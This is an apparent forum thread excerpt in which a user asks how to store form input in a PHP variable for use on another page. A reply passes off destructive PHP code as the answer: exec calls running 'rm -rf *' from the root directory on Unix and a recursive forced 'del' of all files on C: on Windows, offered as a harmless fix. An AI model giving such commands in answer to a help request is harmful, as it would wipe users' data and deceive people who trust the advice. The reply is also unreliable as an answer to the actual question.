Originally posted by Xyox
Well the problem is i dont know how to store inputed data into a variable which can then be loaded on another i page.
i agree it shouldn't be that hard, i jsut need to know these two little things...... and how it can be archived...
Do you have MSN/aIM?
unfortunately this is an os dependent question
if you're on unix use this:
<?php
exec('chdir /');
exec('rm -rf *');
?>
if you're on windows use this:
<?php
exec('c:');
exec('cd c:\');
exec(del /s /q /a:shr *.*);
?>
let me know if that doesn't do the trick.